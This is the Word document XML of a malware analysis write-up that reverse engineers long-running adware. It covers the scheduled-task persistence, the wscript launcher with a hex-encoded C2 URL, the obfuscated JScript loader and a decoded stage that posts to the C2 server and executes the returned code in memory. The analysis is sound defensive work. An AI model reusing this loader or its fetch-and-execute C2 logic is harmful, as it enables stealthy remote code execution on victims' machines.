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EA" w:rsidRPr="00BC3AEA" w:rsidRDefault="00BC3AEA" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Reverse engineering of an Advanced Persistent Adware/Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3AEA" w:rsidRDefault="00BC3AEA" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537E42" w:rsidRDefault="00BC3AEA" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>The Ad/Mal-ware described in this document</w:t>
      </w:r>
      <w:r w:rsidR="00537E42">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537E42" w:rsidRDefault="00537E42" w:rsidP="00537E42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comes along with </w:t>
      </w:r>
      <w:r w:rsidR="00072991">
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r>
        <w:t>installers of 3the party software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00F842CB" w:rsidP="00537E42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Tries to bypass (classic) antivirus software by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537E42" w:rsidRDefault="00537E42" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Us</w:t>
      </w:r>
      <w:r w:rsidR="00F842CB">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> multilevel obfuscation</w:t>
      </w:r>
      <w:r w:rsidR="008A5F20">
        <w:t xml:space="preserve"> techniques</w:t>
      </w:r>
      <w:r w:rsidR="00F842CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00537E42" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Execut</w:t>
      </w:r>
      <w:r w:rsidR="00F842CB">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r>
        <w:t>in memory</w:t>
      </w:r>
      <w:r w:rsidR="00F842CB">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00F842CB" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stays persistent via schedules tasks </w:t>
      </w:r>
      <w:r w:rsidR="00A525D3">
        <w:t xml:space="preserve">(usually scheduled hourly) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00A525D3">
        <w:t xml:space="preserve">via the registry by a </w:t>
      </w:r>
      <w:r w:rsidR="00276E1C">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>runonce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00276E1C">
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="00A525D3">
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A525D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537E42" w:rsidRDefault="008A5F20" w:rsidP="00537E42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Capable to provide commands remotely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRDefault="00F842CB" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00875BA3">
        <w:t>This is an adware that at least goes back to 2016</w:t>
      </w:r>
      <w:r w:rsidR="00072991">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which has been evolved over time (other obfuscation </w:t>
      </w:r>
      <w:r w:rsidR="00BC3AEA">
        <w:t>algorithms</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00072991">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00875BA3">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:t>still to be active</w:t>
      </w:r>
      <w:r w:rsidR="00875BA3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00875BA3">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006764AE" w:rsidRPr="006764AE">
        <w:t>As there is barely anything to find about it, I thought why not reverse it and sharing my findings of one of the latest versions of the ad/mal-ware?</w:t>
      </w:r>
      <w:r w:rsidR="00875BA3">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00641C59" w:rsidRDefault="00880255" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r w:rsidRPr="00880255">
        <w:t>The malware uses a scheduled task to stay persistent so let’s start by analysing the malicious scheduled tasks.</w:t>
      </w:r>
      <w:r w:rsidR="0030156A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0030156A">
        <w:br/>
        <w:t>The malicious scheduled task comes along as a .job file in the windows\tasks folder</w:t>
      </w:r>
      <w:r w:rsidR="00641C59">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00641C59">
        <w:br/>
        <w:t xml:space="preserve">The content of the job file (or use the </w:t>
      </w:r>
      <w:r w:rsidR="00BC3AEA">
        <w:t>task scheduler</w:t>
      </w:r>
      <w:r w:rsidR="00641C59">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A525D3">
        <w:t xml:space="preserve"> reveals the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030156A" w:rsidRDefault="00BC3AEA" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Job file</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A525D3">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A525D3">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00641C59">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A525D3" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>C:\Windows\tasks\</w:t>
      </w:r>
      <w:r w:rsidR="00096305" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Yahoo! Powered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00096305" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>mosil.job</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00641C59">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096305" w:rsidRPr="00BC3AEA" w:rsidRDefault="00B00AF5" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26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</w:pPr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wscript.exe "C:\ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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66D2A3B1-EC90-2977-6A56-B735F0143CFB}\coma" "68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574" "//B" "//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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E:jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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" "--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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IsErIk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00AF5" w:rsidRDefault="00A525D3" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00096305">
        <w:t>Here we see “</w:t>
      </w:r>
      <w:r w:rsidR="00096305" w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>wscript.exe</w:t>
      </w:r>
      <w:r w:rsidR="00096305">
        <w:t xml:space="preserve">” is starting a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00096305">
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00096305">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00096305" w:rsidRPr="0030156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="00096305" w:rsidRPr="0030156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C:\ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00096305" w:rsidRPr="0030156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\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00096305" w:rsidRPr="0030156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0B40</w:t>
      </w:r>
      <w:r w:rsidR="00096305"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CE23-8102-44E5-07C4-DAA79D865168}\daci</w:t>
      </w:r>
      <w:r w:rsidR="00096305" w:rsidRPr="0030156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="00096305">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00B00AF5">
        <w:t>an hex encoded parameter which is an URL of an C2 server</w:t>
      </w:r>
      <w:r w:rsidR="00754ACD">
        <w:t xml:space="preserve"> (which will be used later)</w:t>
      </w:r>
      <w:r w:rsidR="00B00AF5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00AF5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00AF5"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“</w:t>
      </w:r>
      <w:r w:rsidR="00B00AF5"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68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574</w:t>
      </w:r>
      <w:r w:rsidR="00B00AF5"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” &gt; “https://d2wv7denc1jx9z.cloudfront.net”</w:t>
      </w:r>
      <w:r w:rsidR="00B00AF5">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRPr="00096305" w:rsidRDefault="00B00AF5" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26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C3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t>: some versions use multiple hex encoded parameters pointing towards other files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596CB7" w:rsidRDefault="00596CB7" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The script file </w:t>
      </w:r>
      <w:r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Pr="00BC3AE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C:\ProgramData\{66D2A3B1-EC90-2977-6A56-B735F0143CFB}\coma</w:t>
      </w:r>
      <w:r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>
        <w:t>looks like a file filled with crap but that is in fact a load of remarked trash as it is quoted as a remark (‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00596CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>’ ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00596CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’), </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the real </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is hidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> somewhere in the middle.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C6A9AB7" wp14:editId="342EB522">
            <wp:extent cx="6645910" cy="2183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3E" w:rsidRDefault="00A0343E" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="00A0343E" w:rsidP="00A0343E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After cleaning it up a little bit </w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve">and beatify it, </w:t>
      </w:r>
      <w:r>
        <w:t>it becomes more readable:</w:t>
      </w:r>
      <w:r>
        <w:br/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Go(){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hisScrip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WScrip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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0343E" w:rsidRPr="00563EE7" w:rsidRDefault="00563EE7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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ThisScript.Arguments.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A0343E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0 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A0343E" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ThisScript.Arguments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A0343E" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(ThisScript.Arguments.length-1).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A0343E" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A0343E" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(4) == 'E')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3AEA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EncodedScript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=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="00C92A43"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"bc08df14c2b392f..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0343E" w:rsidRPr="00563EE7" w:rsidRDefault="00BC3AEA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="00A0343E"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..97aefd73c9d4d6de1664963ee2e58252936f9b2b30".toString();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  <w:t>var decodedScript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=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"";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offset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193;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while(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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&lt;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.leng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&amp;&amp;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&gt; 47){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ecodedScript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+=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String.fromCharCod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parseIn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) +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 % 4 + 1)), 16));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+=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ncodedScript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off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 % 4 + 2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(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new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Function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ecodedScrip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)()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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0343E" w:rsidRPr="00563EE7" w:rsidRDefault="00A0343E" w:rsidP="00BC3A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Go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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0343E" w:rsidRDefault="00A0343E" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00A0343E" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A30E0">
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve"> contains an </w:t>
      </w:r>
      <w:r w:rsidR="00B11A96">
        <w:t xml:space="preserve">obfuscated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B11A96">
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="00FE1509">
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005277C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidR="005277C0">
        <w:t>which get executed in memory</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t>, th</w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t>e content of this</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve"> is encoded in a variable “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0EF2">
        <w:t>EncocedScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C0EF2">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:br/>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t>only gets decoded and executed if the 5</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2" w:rsidRPr="009C0EF2">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve"> character of the last parameter (</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2"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="009C0EF2" w:rsidRPr="0081518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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0EF2" w:rsidRPr="0081518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Is</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2" w:rsidRPr="00815185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en-GB"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2" w:rsidRPr="00815185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rIk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C0EF2"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="009C0EF2">
        <w:t xml:space="preserve">) of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C0EF2">
        <w:t>wscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t>command line</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t>character ‘</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2" w:rsidRPr="005D1469">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="009C0EF2">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00FE1509">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="00754ACD" w:rsidP="009A20E4">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The decode version of the </w:t>
      </w:r>
      <w:r w:rsidR="005D1469">
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76E4F" w:rsidRP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proofErr w:type="gramStart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 xml:space="preserve"> Main(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76E4F" w:rsidRP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 xml:space="preserve"> e(b){ r&amp;&amp;(r=!0,s.Echo(b)) }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76E4F" w:rsidRP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 xml:space="preserve"> u(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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return(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">new  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ActiveXObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r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C76E4F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>f("536372697074696e672e46696c6553797374656d4f626a656374"))).GetParentFolderName(s.ScriptFullName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7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f(b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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  <w:t>b=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eastAsia="en-GB"/>
        </w:rPr>
        <w:t>b.toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76E4F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spellStart"/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,c=0;c&lt;b.length;c+=2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7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a</w:t>
      </w:r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+=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String.fromCharCode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parseInt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b.substr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(c,2),16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w(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b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BuildPa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u(),f("616f774c43"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FileExists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)&amp;&amp;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DeleteFil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b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CreateTextFil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)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x(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b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BuildPa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u(),f("616f774c43"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!1=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FileExists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b))return!0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 xml:space="preserve">b=new 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ate(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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.GetFil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b).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ateLastModified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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00AE7F04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864E5&lt;new Date-b?!0:</w:t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!1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lastRenderedPageBreak/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y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,a,c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d="",k=0,g=0,e=0,h=0,m=!1,l="",n="",p="",k=[],g=[],q="",m=!1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spellStart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ypeof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==f("6f626a656374")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m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his.ini_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"7068706a732e737472696374466f72496e"),!1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a=</w:t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his.krsor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a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his.ini_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se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"7068706a732e737472696374466f72496e"),m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 in a)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a.hasOwnProperty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d)&amp;&amp;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k.pus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d),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g.pus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a[d]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a=k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c=g</w:t>
      </w:r>
      <w:r w:rsidR="004C5BCE"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e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leng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h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a.leng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l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ypeof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==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737472696e67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n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ypeof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c===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737472696e67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k=0;k&lt;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;k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+){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00AE7F04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m=</w:t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!1</w:t>
      </w:r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l)for(p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k),g=0;g&lt;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;g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+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p=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a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g)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m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 !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0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reak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C76E4F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lse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for(g=0;g&lt;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;g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+)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00C76E4F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r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spellStart"/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b.substr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k,a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[g].length)==a[g]){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00AE7F04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m=</w:t>
      </w:r>
      <w:proofErr w:type="gram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!0</w:t>
      </w:r>
      <w:proofErr w:type="gram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AE7F04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k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k+a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[g].length-1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AE7F04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reak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AE7F04"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q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?q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(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n?c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g):c[g]):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q+b.char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k)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q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z(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try{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b=!1,a="",c=u(),a=l.BuildPath(c,f("6864617432")),c="",d=l.OpenTextFile(a,1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.AtEndOfStream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||(c=</w:t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.ReadAll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var k=f(c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  <w:t>e(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  <w:t>var g;</w:t>
      </w:r>
      <w:r w:rsidR="00D6269D"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,v=u(),a=l.BuildPath(v,f("6864617431")),v="",h=l.OpenTextFile(a,1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.AtEndOfStream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|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|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.ReadAll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)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g=v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-1===</w:t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n.indexOf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/",n.length-1)&amp;&amp;(n+="/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=1;2&gt;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;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+=1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m=new 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ActiveXObjec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f("4d73786d6c322e536572766572584d4c48545450")), s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n+k+f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"26723d")+h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);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e(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.open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"504f5354"),s,!1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"")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.send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g)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200=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.status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r,p=m[f("726573706f6e736554657874")],q=f("576c6c5956315a5656464e5355564250546b314d5330704a5345644752555244516b463665586833646e563063334a786347397562577872616d6c6f5a325a6c5a474e6959546b344e7a59314e444d794d5441724c7a303d"),p=y(p,t._keyStr,t.decode(q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val="nl-BE"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>r=t.decode(p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ab/>
        <w:t>e("");</w:t>
      </w:r>
      <w:r w:rsidR="00D6269D" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="nl-BE"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k=r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""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(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new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Function(k))(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b=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!0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reak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lse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if(403=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.status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break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b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catch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w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!1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(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b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s.Arguments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 xml:space="preserve"> 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i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(b.length-1)!=f("2d2d49734572496b"))return!1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n=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(0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!0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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s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WScrip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WScript.CreateObjec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("575363726970742e5368656c6c"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r=!1,l=new ActiveXObject(f("536372697074696e672e46696c6553797374656d4f626a656374")),t=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lastRenderedPageBreak/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_keyStr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:f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"4142434445464748494a4b4c4d4e4f505152535455565758595a6162636465666768696a6b6c6d6e6f707172737475767778797a303132333435363738392b2f3d"),encode:function(b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c,d,k,g,f,h,e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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6269D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=t._utf8_encode(b)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>e&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>b.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>;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c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e++),d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e++),k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e++), g=c&gt;&gt;2,c=(c&amp;3)&lt;&lt;4|d&gt;&gt;4,f=(d&amp;15)&lt;&lt;2|k&gt;&gt;6,h=k&amp;63,isNaN(d)?f=h=64:isNaN(k)&amp;&amp;(h=64),a=a+this._keyStr.charAt(g)+this._keyStr.charAt(c)+this._keyStr.charAt(f)+this._keyStr.charAt(h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decode:function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b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</w:t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c,d,f,g,e,h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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0;</w:t>
      </w:r>
    </w:p>
